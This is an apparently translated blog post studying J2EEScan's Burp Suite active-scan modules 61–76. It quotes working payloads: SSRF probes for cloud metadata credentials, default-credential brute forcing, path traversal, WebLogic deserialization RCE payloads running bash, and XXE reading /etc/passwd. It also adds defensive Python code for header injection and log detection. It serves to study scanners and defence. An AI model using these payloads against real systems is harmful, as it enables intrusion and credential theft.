[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scan (61-70)
Preface
The 11th set in the plugin development study series. Prerequisite articles:
[BurpSuite] Plugin Development Study: Log4shell
[BurpSuite] Plugin Development Study: Software Vulnerability Scanner
[BurpSuite] Plugin Development Study: dotnet-Beautifier
[BurpSuite] Plugin Development Study: active-scan-plus-plus
[BurpSuite] Plugin Development Study: J2EEScan (Part 1) - Passive Scan
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scan (1-10)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scan (11-20)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scan (21-30)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scan (31-40)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scan (41-50)
[BurpSuite] Plugin Development Study: J2EEScan (Part 2) - Active Scan (51-60)
Analysis
【61】SSRFScanner
Addresses:
private static final List<byte[]> SSRF_INJECTION_TESTS = Arrays.asList(
"gopher://localhost:22/".getBytes(),
"http://[::]:22/".getBytes(),
"ftp://[::]:22/".getBytes(),
"ftp://localhost:22/".getBytes(),
"ftp://0.0.0.0:22/".getBytes(),
"ftp://0177.0000.0000.0001:22".getBytes(),
"ftp://0x7f.1:22/".getBytes(),
"http://spoofed.burpcollaborator.net:22/".getBytes()
);
These probe local port 22.
The match string is:
private static final byte[] GREP_STRING = "OpenSSH".getBytes();
Next it requests the various cloud metadata endpoints:
private static final Map<byte[], Pattern> SSRF_CLOUD_INJECTION_TESTS = new HashMap<byte[], Pattern>() {
{
put("http://169.254.169.254/latest/meta-data/".getBytes(), Pattern.compile("identity-credentials", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
put("http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token".getBytes(), Pattern.compile("token_type", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
}
};
The comments here list some of the cases:
*
* Source AWS
* http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
*
* http://169.254.169.254/latest/user-data
* http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLENAME]
* http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLENAME]
* http://169.254.169.254/latest/meta-data/ami-id
* http://169.254.169.254/latest/meta-data/reservation-id
* http://169.254.169.254/latest/meta-data/hostname
* http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
* http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
*
* # AWS - Dirs http://169.254.169.254/
* http://169.254.169.254/latest/meta-data/
* http://169.254.169.254/latest/meta-data/public-keys/
*
There are also plenty of summaries on the Internet:
http://cn-sec.com/archives/840191.html
【62】StatusServlet
Payload:
private static final List<String> STATUS_SERVLET_PATHS = Arrays.asList(
"/status?full=true",
"/web-console/status?full=true",
"/server-status?full=true"
);
If the response is 401:
if (statusInfo.getStatusCode() == 401) {
it is treated as a login interface being present,
followed by weak-password testing:
WeakPasswordBruteforcer br = new WeakPasswordBruteforcer();
If a 200 is matched with one of the following strings in the response, it indicates service information disclosure (a different service per string):
private static final byte[] GREP_STRING_J2EE = "Status Servlet".getBytes();
private static final byte[] GREP_STRING_HTTPD = "Apache Server Status".getBytes();
【63】TomcatHostManager
Tomcat management console exposure, quite common by now.
private static final List<String> TOMCAT_HOST_MANAGER_PATHS = Arrays.asList(
"/host-manager/html?j2eescan"
);
Then brute force.
【64】TomcatManager
Same as 63.
private static final List<String> TOMCAT_MANAGER_PATHS = Arrays.asList(
"/manager/html"
);
【65】UndertowTraversal CVE-2014-7816
A JBoss issue.
Payload:
private static final List<String> JBOSS_PATHS = Arrays.asList(
"/..\\\\standalone\\\\configuration\\\\standalone.xml"
);
The match is on the XML file that gets read:
private static final List<byte[]> GREP_STRINGS = Arrays.asList(
"<server".getBytes()
);
【66】URINormalizationTomcat
Unauthenticated access to Tomcat:
private static final List<String> TOMCAT_URI_NORMALIZATIONS = Arrays.asList(
"..;/manager/html",
"..;/"
);
Looks familiar: the Shiro unauthenticated-access bypass works the same way.
【67】UTF8ResponseSplitting
Looks like another CRLF injection.
Payload:
private static final byte[] INJ = "%E5%98%8A%E5%98%8DX-Injection:%20test".getBytes();
Match on the response:
if (getResponseHeaderValue(responseInfo, "X-Injection") != null) {
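As an added illustration (my own code, not part of J2EEScan or this post), the following Python models why this probe works and what a header writer must do to defend against it: the two CJK code points narrow to LF and CR when a container truncates each code point to its low byte, so a Location header built from attacker-controlled input splits into a second header. `narrow_lossy` is a hypothetical model of that container behaviour, and the sample input is constructed from the probe above.

```python
from urllib.parse import unquote

# Constructed input: the J2EEScan probe from the text, URL-decoded.
# %E5%98%8A is U+560A and %E5%98%8D is U+560D; their low bytes are 0x0A (LF) and 0x0D (CR).
PROBE = unquote("%E5%98%8A%E5%98%8DX-Injection:%20test")

def narrow_lossy(value):
    """Hypothetical model of the container bug: each code point is written as its
    low byte instead of being encoded or rejected."""
    return bytes(ord(ch) & 0xFF for ch in value)

def emit_location_vulnerable(redirect_target):
    """Header writer that trusts the narrowed bytes without checking them."""
    return b"Location: " + narrow_lossy(redirect_target) + b"\r\n"

def emit_location_safe(redirect_target):
    """Hardened writer: require ISO-8859-1 and reject control bytes after encoding,
    so no narrowing step can produce CR or LF inside the value."""
    try:
        raw = redirect_target.encode("latin-1")
    except UnicodeEncodeError as exc:
        raise ValueError("header value must be ISO-8859-1") from exc
    if any(b < 0x20 or b == 0x7F for b in raw):
        raise ValueError("control byte in header value")
    return b"Location: " + raw + b"\r\n"

def is_rejected(redirect_target):
    """True when the hardened writer refuses the value."""
    try:
        emit_location_safe(redirect_target)
    except ValueError:
        return True
    return False

def parse_headers(block):
    """Tolerant client-side parse (LF-separated, stray CR ignored), the way a
    browser or Burp's response analyzer sees the bytes on the wire."""
    headers = {}
    for line in block.split(b"\n"):
        line = line.strip(b"\r")
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().decode("latin-1")] = value.strip().decode("latin-1")
    return headers
```

With the vulnerable writer, `parse_headers` reports an `X-Injection` header that the application never set, which is exactly the condition the module's `getResponseHeaderValue` check looks for; the hardened writer refuses the value before it reaches the wire.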
【68】WebInfInformationDisclosure
Payload:
private static final List<String> WEBINF_PATHS = Arrays.asList(
"/WEB-INF./web.xml",
"//WEB-INF/web.xml",
"/WEB-INF/web.xml",
"/static/WEB-INF/web.xml", // CVE-2014-0053
"/forward:/WEB-INF/web.xml", // spring issue
"/web-inf./web.xml", // CVE-2016-0793 https://bugzilla.redhat.com/show_bug.cgi?id=1305937
"/.//WEB-INF/web.xml",
"/./WEB-INF/web.xml"
);
Match:
private static final byte[] GREP_STRING = "<web-app".getBytes();
When testing arbitrary file read, it is also worth trying more files of this kind.
【69】WeblogicConsole
Login interface path:
private static final List<String> WEBLOGIC_CONSOLE_PATHS = Arrays.asList(
"/console/login/LoginForm.jsp;ADMINCONSOLESESSION=TynPs0LnRt9BLctc13WMYmhQpsp3cG1LCNDp78TJyDfHMWhC4Kln!1225542286"
);
Match:
private static final List<byte[]> GREP_WEBLOGIC_STRINGS = Arrays.asList(
"<TITLE>BEA WebLogic Server Administration Console".getBytes(),
"<title>Oracle WebLogic Server Administration Console".getBytes(),
"<TITLE>WebLogic Server".getBytes()
);
which indicates that brute force may be possible.
Then the brute force begins:
List<Map.Entry<String, String>> credentials = new ArrayList<>();
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic1"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic01"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "welcome1"));
Fairly crude: only 4 weak passwords with a single account are tried.
【70】Weblogic CVE-2019-2725
Vulnerable path:
private static final List<String> ASYNC_PATHS = Arrays.asList(
"/_async/AsyncResponseService"
);
Payload:
String serializedRce = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"> "
+ "<soapenv:Header>"
+ "<wsa:Action>ONRaJntRjNYBc3MJW2JC</wsa:Action>"
+ "<wsa:RelatesTo>42PlWZ15ODi1hQ3pQ5Ol</wsa:RelatesTo>"
+ "<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"
+ "<void class=\"java.lang.ProcessBuilder\">"
+ "<array class=\"java.lang.String\" length=\"3\">"
+ "<void index=\"0\">"
+ "<string>/bin/bash</string>"
+ "</void>"
+ "<void index=\"1\">"
+ "<string>-c</string>"
+ "</void>"
+ "<void index=\"2\">"
+ "<string>ping -c 3 %s</string>"
+ "</void>"
+ "</array>"
+ "<void method=\"start\"/></void>"
+ "</work:WorkContext>"
+ "</soapenv:Header>"
+ "<soapenv:Body>"
+ "<asy:onAsyncDelivery/>"
+ "</soapenv:Body></soapenv:Envelope>";
// Collaborator context
This is an RCE, probably used a lot in HW (护网) exercises.
【71】Weblogic CVE-2017-10271
This one has even more paths to try:
private static final List<String> WLS_WSAT_PATHS = Arrays.asList(
"/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11",
"/wls-wsat/ParticipantPortType",
"/wls-wsat/ParticipantPortType11",
"/wls-wsat/RegistrationPortTypeRPC",
"/wls-wsat/RegistrationPortTypeRPC11",
"/wls-wsat/RegistrationRequesterPortType",
"/wls-wsat/RegistrationRequesterPortType11"
);
Payload:
String serializedRce = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"
+ "<soapenv:Header>"
+ "<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"
+ " <java version=\"1.8\" class=\"java.beans.XMLDecoder\">"
+ " <void id=\"url\" class=\"java.net.URL\">"
+ " <string>http://%s</string>"
+ " </void>"
+ " <void idref=\"url\">"
+ " <void id=\"stream\" method = \"openStream\" />"
+ " </void>"
+ " </java>"
+ "</work:WorkContext>"
+ "</soapenv:Header>"
+ "<soapenv:Body/>"
+ "</soapenv:Envelope>";
This is also an RCE.
【72】WeblogicUDDIExplorer CVE-2014-4210 SSRF
Path:
private static final List<String> UDDI_PATHS = Arrays.asList(
"/uddiexplorer/"
);
If any of these is matched:
private static final List<byte[]> GREP_SSRF_STRINGS = Arrays.asList(
"could not connect over HTTP to server:".getBytes(),
"XML_SoapException: Connection refused".getBytes(),
"XML_SoapException: Received a response from url".getBytes()
);
it indicates SSRF.
A fairly coarse judgement;
in practice the specific vulnerability request still has to be sent.
【73】WeblogicWebServiceTestPage CVE-2018-2894
Vulnerable path:
private static final List<String> WS_TEST_PAGES = Arrays.asList(
"/ws_utc/config.do"
);
Match:
private static final List<byte[]> GREP_STRINGS = Arrays.asList(
"<title>settings</title>".getBytes()
);
then the vulnerability exists.
This is a test page that allows arbitrary file upload with no access control.
【74】XInclude arbitrary file upload
Just one payload:
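Turning the path lists from modules 62 through 73 around for the defender, here is an added Python example (my own, not part of J2EEScan) that canonicalizes request targets from access-log lines the way a servlet container resolves them, stripping path parameters and collapsing the `..;/`, backslash and `WEB-INF.` tricks, and then flags requests that land on those probe paths. The signature labels, the sample log lines and their format are constructed.

```python
import re
from urllib.parse import unquote, urlsplit
# Path signatures taken from the J2EEScan path lists quoted above (modules 62-66, 68-73).
PROBE_SIGNATURES = {
    "status-servlet":     re.compile(r"^/(web-console/|server-)?status$"),
    "tomcat-manager":     re.compile(r"^/(host-)?manager/html$"),
    "undertow-traversal": re.compile(r"/configuration/standalone\.xml$"),
    "web-inf-disclosure": re.compile(r"/web-inf\.?/web\.xml$", re.I),
    "weblogic-console":   re.compile(r"^/console/login/LoginForm\.jsp$"),
    "weblogic-async":     re.compile(r"^/_async/AsyncResponseService$"),
    "weblogic-wsat":      re.compile(r"^/wls-wsat/"),
    "weblogic-uddi":      re.compile(r"^/uddiexplorer/"),
    "weblogic-ws-utc":    re.compile(r"^/ws_utc/config\.do$"),
}
# Shapes used to slip past naive prefix filters: "..;", backslash, dot segment, "//", "forward:".
EVASION = re.compile(r"\.\.;|\\|\./|//|forward:")
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SAMPLE_LOG = [  # constructed combined-format access log lines
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.jsp HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /..;/manager/html HTTP/1.1" 401 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /WEB-INF./web.xml HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0',
]

def normalize_path(target):
    """Decode and canonicalize a request target roughly as Tomcat/WebLogic would."""
    out = []
    for seg in unquote(urlsplit(target).path).replace("\\", "/").split("/"):
        seg = seg.split(";", 1)[0]          # drop ";jsessionid=..", turn "..;" into ".."
        if seg == "..":
            out = out[:-1]
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)

def classify(target):
    """Return (signature, evasion_used) for a probe-like target, else None."""
    norm = normalize_path(target)
    for name, rx in PROBE_SIGNATURES.items():
        if rx.search(norm):
            return name, bool(EVASION.search(urlsplit(target).path))
    return None

def scan_access_log(lines):
    """Return [(signature, evasion_used, raw_target)] for each probe-like request."""
    hits = []
    for m in filter(None, map(LOG_RE.search, lines)):
        verdict = classify(m.group("target"))
        if verdict:
            hits.append((verdict[0], verdict[1], m.group("target")))
    return hits
```

The `evasion_used` flag is the useful signal for triage: a plain `/manager/html` hit may be an administrator, while `/..;/manager/html` or a backslash traversal is almost always a scanner.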
private static final List<byte[]> XINCLUDE_INJ_TESTS = Arrays.asList(
"<xi:include href=\"file:///etc/passwd\" parse=\"text\"/>".getBytes());
【75】XXEModule
Payload:
private static final String XXE_DTD_DEFINITION = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>";
This one echoes the result back; it looks like a general-purpose module.
【76】XXEParameterModule
Payload:
private static final List<byte[]> XXE_INJECTION_TESTS = Arrays.asList(
"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:etc/passwd\"\">]><foo>&xxe;</foo>".getBytes(),
// https://twitter.com/Agarri_FR/status/656440244116574208
"<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM \"file:///etc/passwd\"> %dtd;]><xxx/>]]>".getBytes()
);
Same idea.
One loads an external DTD, the other parses and echoes directly.
Match:
private static final List<Pattern> XXE_RE_MATCHES = Arrays.asList(
Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
Pattern.compile("file not found", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
Pattern.compile("java\\.io\\.FileNotFoundException", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
But external DTD loading is usually not tested with file:; using the http protocol is more common, since it can hit DNSlog.